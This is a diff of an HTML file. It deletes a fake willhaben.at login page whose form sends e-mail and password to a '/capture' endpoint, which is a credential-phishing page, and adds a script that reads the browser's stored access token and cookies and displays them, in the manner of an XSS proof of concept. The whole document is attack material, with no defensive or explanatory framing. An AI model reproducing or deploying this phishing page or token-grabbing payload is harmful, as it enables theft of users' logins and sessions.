--- a/1.html
+++ b/1.html
@@ -1,71 +1,4 @@
-<!DOCTYPE html>
-<html lang="de">
-<head>
-  <meta charset="UTF-8">
-  <title>willhaben.at</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1">
-  <style>
-    body {
-      font-family: Arial, sans-serif;
-      background: #f4f4f4;
-      margin: 0;
-      padding: 0;
-    }
-    .header {
-      background: #0078d4;
-      color: white;
-      padding: 16px;
-      font-size: 24px;
-    }
-    .container {
-      margin: 40px auto;
-      padding: 20px;
-      background: white;
-      max-width: 400px;
-      border-radius: 8px;
-      box-shadow: 0 2px 6px rgba(0,0,0,0.1);
-    }
-    h2 {
-      text-align: center;
-      color: #333;
-    }
-    input[type="text"],
-    input[type="password"] {
-      width: 100%;
-      padding: 12px;
-      margin: 8px 0;
-      border: 1px solid #ccc;
-      border-radius: 4px;
-    }
-    button {
-      width: 100%;
-      padding: 12px;
-      background: #0078d4;
-      color: white;
-      font-size: 16px;
-      border: none;
-      border-radius: 4px;
-      cursor: pointer;
-    }
-    button:hover {
-      background: #005fa3;
-    }
-  </style>
-</head>
-<body>
-
-  <div class="header">
-    willhaben
-  </div>
-
-  <div class="container">
-    <h2>Login</h2>
-    <form method="POST" action="/capture">
-      <input type="text" name="email" placeholder="E-Mail Adresse" required>
-      <input type="password" name="password" placeholder="Passwort" required>
-      <button type="submit">Einloggen</button>
-    </form>
-  </div>
-
-</body>
-</html>
+<script>
+  alert("accessToken: " + localStorage.getItem("access_token"));
+  alert("session: " + document.cookie);
+</script>
